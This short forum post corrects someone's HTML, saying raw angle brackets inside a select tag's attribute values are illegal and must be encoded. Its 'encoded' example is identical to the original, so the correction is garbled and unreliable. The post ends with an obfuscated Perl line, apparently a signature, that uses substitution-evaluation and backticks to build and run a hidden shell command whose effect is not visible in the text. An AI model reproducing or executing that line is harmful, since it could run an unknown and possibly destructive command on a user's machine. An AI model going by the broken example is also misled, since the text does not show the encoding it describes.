Being picky again and, correct me anyone knowing better, but <select name="url>adee" value="wq<ew"> is not legal HTML. It has to be encoded as <select name="url>adee" value="wq<ew"> s$$([},&%#}/&/]+}%&{})*;#$&&s&&$^X.($'^"%]=\&(|?*{% +.+=%;.#_}\&"^"-+%*).}%:##%}={~=~:.")&e&&s""`$''`"e
